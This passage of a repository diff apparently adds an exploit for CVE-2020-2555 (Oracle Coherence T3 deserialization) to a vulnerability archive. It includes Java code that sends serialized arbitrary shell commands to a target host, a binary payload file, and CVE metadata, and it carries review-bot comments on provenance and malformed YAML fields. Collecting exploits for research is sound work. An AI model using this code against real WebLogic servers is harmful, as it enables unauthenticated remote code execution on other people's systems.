+ byte[] payload = SerialDataGenerator.serialUploadDatas(filePath, content);
+ T3ProtocolOperation.send(host, port, payload);
+ }
+
+ public static void blindExecute(String host, String port, String cmd) throws Exception {
+ String[] cmds = new String[]{cmd};
+ if (Main.cmdLine.hasOption("os")) {
+ if (Main.cmdLine.getOptionValue("os").equalsIgnoreCase("linux")) {
+ cmds = new String[]{"/bin/bash", "-c", cmd};
+ } else {
+ cmds = new String[]{"cmd.exe", "/c", cmd};
+ }
+ }
+ byte[] payload = SerialDataGenerator.serialBlindDatas(cmds);
+ T3ProtocolOperation.send(host, port, payload);
+ }
+
+}
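Review bot: The header `// Source code recreated from a .class file by IntelliJ IDEA` here and in `T3ProtocolOperation.java` shows that these files are decompiler output rather than the author's source, so their origin and licence cannot be checked from this commit, which also adds an opaque `test.ser` binary. For an archive that other people will build and run, the entry should record where the class files came from and a checksum for each binary, for instance in the CVE's YAML `reference:` list. `import com.supeream.serial.Serializables;` is unused in this file.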
diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/test.ser b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/test.ser
new file mode 100644
index 0000000000000000000000000000000000000000..b6550e59e887d6035da4ff1529705237fce39c51
Binary files /dev/null and b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/test.ser differ
diff --git a/cve/Oracle/2020/yaml/CVE-2020-2555.yaml b/cve/Oracle/2020/yaml/CVE-2020-2555.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391
diff --git "a/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" "b/\346\274\217\346\264\236\346\250\241\347\211\210.yaml"
index 1de85f71f54e22f3e557618d5ad800d42ff653e7..c8143c64f770309c20570d2b3819db2707b8f0f1 100644
--- "a/\346\274\217\346\264\236\346\250\241\347\211\210.yaml"
+++ "b/\346\274\217\346\264\236\346\250\241\347\211\210.yaml"
@@ -1,19 +1,23 @@
-id: 漏洞编号
-source: 漏洞验证程序来源
+id: Timeline Sec
+CVE-2020-2555
+source: https://github.com/wsfengfan/CVE-2020-2555
 info:
- name: 漏洞软件包简介
- severity: 漏洞危害
+ name:Oracle Coherence为Oracle融合中间件中的产品,在WebLogic 12c及以上版本中默认集成到WebLogic安装包中,T3是用于在WebLogic服务器和其他类型的Java程序之间传输信息的协议。
+ severity: 攻击者利用该漏洞可实现在目标主机上执行任意代码。使用了Oracle Coherence库的产品受此漏洞影响。
 description: |
- 漏洞描述
+ 该漏洞允许未经身份验证的攻击者通过构造T3网络协议请求进行攻击,成功利用该漏洞可实现在目标主机上执行任意代码。使用了Oracle Coherence库的产品受此漏洞影响,在WebLogic Server 11g Release(10.3.4)及以上版本的安装包中默认集成了Oracle Coherence库。
 scope-of-influence:
- 漏洞影响范围
+ Oracle Coherence 3.7.1.17
+ Oracle Coherence 12.1.3.0.0
+ Oracle Coherence 12.2.1.3.0
+ Oracle Coherence 12.2.1.4.0
 reference:
- - 漏洞相关链接
+ - https://cloud.tencent.com/developer/article/1622124
 classification:
- cvss-metrics: CVSS:3.1
- cvss-score: 漏洞评分
+ cvss-metrics: CVSS:3.0
+ cvss-score: Score 9.8
 cve-id:
 cwe-id:
 cnvd-id:
 kve-id:
- tags: 漏洞标签
\ No newline at end of file
+ tags: CVE-2020-2555 一月 15, 2020; 12:15:17 下午 -0500
\ No newline at end of file
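Review bot: The CVE metadata has landed in the shared template file rather than the per-CVE file: `cve/Oracle/2020/yaml/CVE-2020-2555.yaml` is added with the empty-blob index `e69de29…` and no hunk, while the template loses its placeholders for the next contributor. The new content is also unlikely to parse as intended, because `id:` is split across two added lines and `name:Oracle …` has no space after the colon; I would expect `id: CVE-2020-2555` and `name: Oracle Coherence`. `severity` holds a sentence rather than a level, `cvss-score: Score 9.8` should be the bare number `cvss-score: 9.8`, `cvss-metrics` carries only the version prefix without a vector string, `cve-id` is left empty, and `tags` contains a timestamp. Any scanner or index that consumes these files by field would mis-rank or skip this entry until the fields are normalised.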